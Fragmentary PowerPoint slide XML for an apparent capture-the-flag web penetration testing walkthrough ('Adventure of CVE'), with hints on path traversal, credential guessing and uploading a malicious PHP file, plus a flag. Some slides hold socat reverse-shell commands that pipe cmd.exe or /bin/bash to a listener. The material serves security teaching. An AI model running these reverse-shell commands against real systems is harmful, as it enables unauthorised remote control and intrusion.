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ontserrat Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
      <p:italic r:id="rId31"/>
      <p:boldItalic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  <p:embeddedFont>
      <p:font typeface="Poppi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PO2zcsDKltmpgmSPIFej+iAX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CTF{b12e3b34c581d4f3c66c00cc7f8dabec8838dab0acf26c2cfbe2f7d291326f75} CTF{b12e3b34c581d4f3c66c00cc7f8dabec8838dab0acf26c2cfbe2f7d291326f75}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latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>sudo socat TCP4-LISTEN:8888 STDOUT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latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>socat TCP4:192.168.0.147:8888 EXEC:cmd.exe,pipes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b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latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>-------Get Bash on Windows-------------------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>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>socat TCP4-LISTEN:8888 STDOUT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>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>sudo socat TCP4:192.168.0.127:7777 EXEC:/bin/bash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https://www.iana.org/assignments/media-types/media-types.xhtml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https://www.iana.org/assignments/media-types/media-types.xhtml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https://www.iana.org/assignments/media-types/media-types.xhtml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https://www.iana.org/assignments/media-types/media-types.xhtml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8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8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8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8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8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8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8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8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8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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="4363775" y="-3213"/>
            <a:ext cx="4780225" cy="2116171"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5072934" cy="2245751"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Google Shape;42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2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45" name="Google Shape;45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49" name="Google Shape;49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" name="Google Shape;53;p2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54" name="Google Shape;54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8" name="Google Shape;58;p2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59" name="Google Shape;59;p2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60" name="Google Shape;60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2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63" name="Google Shape;63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2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30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72" name="Google Shape;72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" name="Google Shape;73;p30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74" name="Google Shape;74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0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77" name="Google Shape;77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0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80" name="Google Shape;80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0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83" name="Google Shape;83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" name="Google Shape;87;p30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88" name="Google Shape;88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2" name="Google Shape;92;p30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93" name="Google Shape;93;p30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94" name="Google Shape;94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p3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97" name="Google Shape;97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30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iana.org/assignments/media-types/media-types.x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2149252" y="667105"/>
            <a:ext cx="4845480" cy="7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>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Web Penetration Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="EA4153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6" y="4077546"/>
            <a:ext cx="9144000" cy="724747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2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 descr="Text,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54" y="4123874"/>
            <a:ext cx="1645485" cy="62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4413" y="3896656"/>
            <a:ext cx="1076634" cy="10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 descr="A picture containing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9758" y="4122430"/>
            <a:ext cx="1878777" cy="625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4026" y="4146690"/>
            <a:ext cx="836908" cy="5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2149252" y="1834741"/>
            <a:ext cx="48454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obtain a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REVERSE SHELL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remote server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-3413" y="515508"/>
            <a:ext cx="13988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Description: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-3413" y="823285"/>
            <a:ext cx="3162925" cy="175432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Welcome to the magical world of Adventure of CVE. Explore as much as you can this land of services.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Flag format: CTF{sha256}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Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>: Hard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92D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Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none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35.246.170.233:31064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112" y="823285"/>
            <a:ext cx="5759313" cy="369667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09" name="Google Shape;209;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3536484"/>
            <a:ext cx="188779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Hint 1: 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Path Traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p1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1" name="Google Shape;21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3516178" y="2187029"/>
            <a:ext cx="2111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? ? ?</a:t>
            </a:r>
            <a:endParaRPr sz="36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7" name="Google Shape;217;p11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0" y="330353"/>
            <a:ext cx="21116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Let's try: View Page Source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25" name="Google Shape;225;p1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0818" y="655647"/>
            <a:ext cx="6282364" cy="401618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28" name="Google Shape;228;p12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6719247" y="2329654"/>
            <a:ext cx="2330861" cy="461665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2330861" h="461665" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="170444" y="-67009"/>
                  <a:pt x="435410" y="32453"/>
                  <a:pt x="559407" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="683404" y="-32453"/>
                  <a:pt x="943111" y="72687"/>
                  <a:pt x="1165431" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387751" y="-72687"/>
                  <a:pt x="1653746" y="50965"/>
                  <a:pt x="1794763" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1935780" y="-50965"/>
                  <a:pt x="2172257" y="25375"/>
                  <a:pt x="2330861" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2374531" y="139355"/>
                  <a:pt x="2303269" y="369241"/>
                  <a:pt x="2330861" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2150660" y="497365"/>
                  <a:pt x="2043444" y="446592"/>
                  <a:pt x="1818072" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1592700" y="476738"/>
                  <a:pt x="1531081" y="448405"/>
                  <a:pt x="1281974" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1032867" y="474925"/>
                  <a:pt x="956562" y="417148"/>
                  <a:pt x="675950" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="395338" y="506182"/>
                  <a:pt x="224304" y="386983"/>
                  <a:pt x="0" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37368" y="274804"/>
                  <a:pt x="6952" y="130794"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="2330861" h="461665" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="273100" y="-14163"/>
                  <a:pt x="373590" y="17227"/>
                  <a:pt x="629332" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="885074" y="-17227"/>
                  <a:pt x="947768" y="59804"/>
                  <a:pt x="1165431" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1383094" y="-59804"/>
                  <a:pt x="1476496" y="39666"/>
                  <a:pt x="1724837" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1973178" y="-39666"/>
                  <a:pt x="2160637" y="167"/>
                  <a:pt x="2330861" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2363505" y="176306"/>
                  <a:pt x="2305533" y="350574"/>
                  <a:pt x="2330861" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2070682" y="492566"/>
                  <a:pt x="1948381" y="460167"/>
                  <a:pt x="1748146" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1547911" y="463163"/>
                  <a:pt x="1482516" y="435765"/>
                  <a:pt x="1235356" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="988196" y="487565"/>
                  <a:pt x="795977" y="432556"/>
                  <a:pt x="675950" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="555923" y="490774"/>
                  <a:pt x="137913" y="457469"/>
                  <a:pt x="0" y="461665"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-12418" y="314328"/>
                  <a:pt x="44814" y="183101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Now we have to wild guess user/pass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4" name="Google Shape;234;p1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38" y="607352"/>
            <a:ext cx="6471681" cy="405419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37" name="Google Shape;237;p13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0" y="370764"/>
            <a:ext cx="21116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Add “bolt” to url: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689" y="647763"/>
            <a:ext cx="7324619" cy="385506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46" name="Google Shape;246;p14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0" y="370764"/>
            <a:ext cx="21116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Bingo !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1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35982"/>
            <a:ext cx="6864968" cy="360614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55" name="Google Shape;255;p1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6980665" y="2156251"/>
            <a:ext cx="1940312" cy="830997"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1940312" h="830997" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="192177" y="-19692"/>
                  <a:pt x="342550" y="23379"/>
                  <a:pt x="446272" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="549994" y="-23379"/>
                  <a:pt x="767977" y="38928"/>
                  <a:pt x="950753" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1133529" y="-38928"/>
                  <a:pt x="1285431" y="23452"/>
                  <a:pt x="1377622" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1469813" y="-23452"/>
                  <a:pt x="1714816" y="43545"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957006" y="114548"/>
                  <a:pt x="1895966" y="280497"/>
                  <a:pt x="1940312" y="398879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1984658" y="517261"/>
                  <a:pt x="1907311" y="629148"/>
                  <a:pt x="1940312" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1805316" y="831724"/>
                  <a:pt x="1580800" y="798397"/>
                  <a:pt x="1474637" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1368474" y="863597"/>
                  <a:pt x="1229004" y="812618"/>
                  <a:pt x="989559" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="750114" y="849376"/>
                  <a:pt x="639984" y="793216"/>
                  <a:pt x="543287" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="446590" y="868778"/>
                  <a:pt x="199077" y="824025"/>
                  <a:pt x="0" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-45501" y="696351"/>
                  <a:pt x="37564" y="546286"/>
                  <a:pt x="0" y="407189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37564" y="268092"/>
                  <a:pt x="44515" y="120117"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="1940312" h="830997" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="221224" y="-14201"/>
                  <a:pt x="357736" y="28011"/>
                  <a:pt x="504481" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651226" y="-28011"/>
                  <a:pt x="852084" y="21760"/>
                  <a:pt x="1028365" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1204646" y="-21760"/>
                  <a:pt x="1744731" y="58576"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1971018" y="127101"/>
                  <a:pt x="1908502" y="317669"/>
                  <a:pt x="1940312" y="415499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1972122" y="513329"/>
                  <a:pt x="1913972" y="697005"/>
                  <a:pt x="1940312" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1802590" y="854734"/>
                  <a:pt x="1556037" y="828774"/>
                  <a:pt x="1455234" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1354431" y="833220"/>
                  <a:pt x="1171984" y="790437"/>
                  <a:pt x="931350" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="690716" y="871557"/>
                  <a:pt x="675409" y="782013"/>
                  <a:pt x="426869" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178329" y="879981"/>
                  <a:pt x="154786" y="823203"/>
                  <a:pt x="0" y="830997"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-43728" y="636371"/>
                  <a:pt x="2920" y="509876"/>
                  <a:pt x="0" y="415499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2920" y="321122"/>
                  <a:pt x="7186" y="159756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Now you need to go to file management to see if you can upload some malicious files.</a:t>
            </a:r>
            <a:endParaRPr sz="105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57" name="Google Shape;257;p15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="256" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5969665" y="2571750"/>
            <a:ext cx="1011000" cy="699300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="EA415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1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3601843" y="2279362"/>
            <a:ext cx="1940312" cy="584775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1940312" h="584775" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="185722" y="-35426"/>
                  <a:pt x="337025" y="31345"/>
                  <a:pt x="426869" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516713" y="-31345"/>
                  <a:pt x="715990" y="18000"/>
                  <a:pt x="853737" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="991484" y="-18000"/>
                  <a:pt x="1138901" y="36991"/>
                  <a:pt x="1280606" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1422311" y="-36991"/>
                  <a:pt x="1614052" y="38837"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1955788" y="127784"/>
                  <a:pt x="1929500" y="463323"/>
                  <a:pt x="1940312" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1792701" y="586549"/>
                  <a:pt x="1602092" y="549509"/>
                  <a:pt x="1474637" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1347183" y="620041"/>
                  <a:pt x="1112832" y="534466"/>
                  <a:pt x="950753" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="788674" y="635084"/>
                  <a:pt x="638845" y="560683"/>
                  <a:pt x="504481" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="370117" y="608867"/>
                  <a:pt x="229616" y="541672"/>
                  <a:pt x="0" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1108" y="386124"/>
                  <a:pt x="8611" y="270497"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="1940312" h="584775" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="221224" y="-14201"/>
                  <a:pt x="357736" y="28011"/>
                  <a:pt x="504481" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="651226" y="-28011"/>
                  <a:pt x="852084" y="21760"/>
                  <a:pt x="1028365" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1204646" y="-21760"/>
                  <a:pt x="1744731" y="58576"/>
                  <a:pt x="1940312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1977932" y="178217"/>
                  <a:pt x="1882177" y="301881"/>
                  <a:pt x="1940312" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1797794" y="635837"/>
                  <a:pt x="1610172" y="540047"/>
                  <a:pt x="1455234" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1300296" y="629503"/>
                  <a:pt x="1098475" y="532378"/>
                  <a:pt x="989559" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="880644" y="637172"/>
                  <a:pt x="706309" y="544215"/>
                  <a:pt x="465675" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225041" y="625335"/>
                  <a:pt x="160586" y="554875"/>
                  <a:pt x="0" y="584775"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-41603" y="390720"/>
                  <a:pt x="61672" y="268867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? ? ?</a:t>
            </a:r>
            <a:endParaRPr sz="2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17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2024656" y="2033240"/>
            <a:ext cx="5094685" cy="1077218"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5094685" h="1077218" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="222265" y="-21339"/>
                  <a:pt x="269414" y="51341"/>
                  <a:pt x="464182" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="658950" y="-51341"/>
                  <a:pt x="809306" y="2892"/>
                  <a:pt x="928365" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1047424" y="-2892"/>
                  <a:pt x="1248195" y="52101"/>
                  <a:pt x="1392547" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1536899" y="-52101"/>
                  <a:pt x="1719444" y="27357"/>
                  <a:pt x="1856730" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1994016" y="-27357"/>
                  <a:pt x="2275989" y="56660"/>
                  <a:pt x="2524699" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2773409" y="-56660"/>
                  <a:pt x="2793382" y="28571"/>
                  <a:pt x="2988882" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3184382" y="-28571"/>
                  <a:pt x="3311260" y="81"/>
                  <a:pt x="3605905" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3900550" y="-81"/>
                  <a:pt x="3974790" y="41711"/>
                  <a:pt x="4222928" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4471066" y="-41711"/>
                  <a:pt x="4829273" y="82930"/>
                  <a:pt x="5094685" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5152413" y="156445"/>
                  <a:pt x="5094471" y="280213"/>
                  <a:pt x="5094685" y="506292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5094899" y="732371"/>
                  <a:pt x="5051740" y="813322"/>
                  <a:pt x="5094685" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4904118" y="1127407"/>
                  <a:pt x="4689263" y="1021775"/>
                  <a:pt x="4579556" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4469849" y="1132661"/>
                  <a:pt x="4319272" y="1062526"/>
                  <a:pt x="4166320" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4013368" y="1091910"/>
                  <a:pt x="3899779" y="1051397"/>
                  <a:pt x="3753085" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3606392" y="1103039"/>
                  <a:pt x="3324445" y="1049468"/>
                  <a:pt x="3085115" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2845785" y="1104968"/>
                  <a:pt x="2624900" y="1034923"/>
                  <a:pt x="2417145" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2209390" y="1119513"/>
                  <a:pt x="2134602" y="1038872"/>
                  <a:pt x="1902016" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1669430" y="1115564"/>
                  <a:pt x="1659433" y="1054400"/>
                  <a:pt x="1488780" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1318127" y="1100036"/>
                  <a:pt x="1254936" y="1033516"/>
                  <a:pt x="1024598" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="794260" y="1120920"/>
                  <a:pt x="447859" y="976971"/>
                  <a:pt x="0" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-55542" y="913721"/>
                  <a:pt x="2630" y="666217"/>
                  <a:pt x="0" y="527837"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2630" y="389457"/>
                  <a:pt x="25478" y="167889"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="5094685" h="1077218" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="285554" y="-71555"/>
                  <a:pt x="392702" y="63839"/>
                  <a:pt x="617023" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="841344" y="-63839"/>
                  <a:pt x="1087409" y="3018"/>
                  <a:pt x="1284993" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1482577" y="-3018"/>
                  <a:pt x="1722630" y="2053"/>
                  <a:pt x="1952963" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2183296" y="-2053"/>
                  <a:pt x="2391642" y="21648"/>
                  <a:pt x="2519039" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2646436" y="-21648"/>
                  <a:pt x="2755903" y="36678"/>
                  <a:pt x="2932274" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3108645" y="-36678"/>
                  <a:pt x="3392758" y="20005"/>
                  <a:pt x="3549297" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3705836" y="-20005"/>
                  <a:pt x="3935000" y="31355"/>
                  <a:pt x="4115373" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4295746" y="-31355"/>
                  <a:pt x="4722826" y="12791"/>
                  <a:pt x="5094685" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5123506" y="188863"/>
                  <a:pt x="5047530" y="357667"/>
                  <a:pt x="5094685" y="527837"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5141840" y="698007"/>
                  <a:pt x="5048235" y="925912"/>
                  <a:pt x="5094685" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4872790" y="1142638"/>
                  <a:pt x="4694079" y="1012989"/>
                  <a:pt x="4477662" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4261245" y="1141447"/>
                  <a:pt x="4091467" y="1018044"/>
                  <a:pt x="3962533" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3833599" y="1136392"/>
                  <a:pt x="3596453" y="1018806"/>
                  <a:pt x="3447404" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3298355" y="1135630"/>
                  <a:pt x="3201649" y="1043720"/>
                  <a:pt x="2983221" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2764793" y="1110716"/>
                  <a:pt x="2508290" y="1006963"/>
                  <a:pt x="2315251" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2122212" y="1147473"/>
                  <a:pt x="2048859" y="1021540"/>
                  <a:pt x="1851069" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1653279" y="1132896"/>
                  <a:pt x="1558143" y="1070493"/>
                  <a:pt x="1335940" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1113737" y="1083943"/>
                  <a:pt x="955500" y="1067985"/>
                  <a:pt x="769864" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="584228" y="1086451"/>
                  <a:pt x="321250" y="1018088"/>
                  <a:pt x="0" y="1077218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-14449" y="830867"/>
                  <a:pt x="25598" y="669079"/>
                  <a:pt x="0" y="549381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-25598" y="429683"/>
                  <a:pt x="44579" y="212855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try to create and upload vulnerable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.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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file</a:t>
            </a:r>
            <a:endParaRPr sz="2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8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1056101" y="2279362"/>
            <a:ext cx="7031795" cy="584775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7031795" h="584775" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="169457" y="-6288"/>
                  <a:pt x="340554" y="10126"/>
                  <a:pt x="515665" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="690777" y="-10126"/>
                  <a:pt x="888785" y="78700"/>
                  <a:pt x="1171966" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1455147" y="-78700"/>
                  <a:pt x="1654817" y="45867"/>
                  <a:pt x="1828267" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2001717" y="-45867"/>
                  <a:pt x="2212802" y="48790"/>
                  <a:pt x="2343932" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2475062" y="-48790"/>
                  <a:pt x="2554363" y="25228"/>
                  <a:pt x="2718961" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2883559" y="-25228"/>
                  <a:pt x="3042990" y="25154"/>
                  <a:pt x="3164308" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3285626" y="-25154"/>
                  <a:pt x="3463274" y="14139"/>
                  <a:pt x="3609655" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3756036" y="-14139"/>
                  <a:pt x="3908465" y="25431"/>
                  <a:pt x="3984684" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4060903" y="-25431"/>
                  <a:pt x="4237443" y="10239"/>
                  <a:pt x="4359713" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4481983" y="-10239"/>
                  <a:pt x="4841533" y="29545"/>
                  <a:pt x="5016014" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5190495" y="-29545"/>
                  <a:pt x="5383269" y="59913"/>
                  <a:pt x="5742633" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6101997" y="-59913"/>
                  <a:pt x="5945636" y="10815"/>
                  <a:pt x="6117662" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
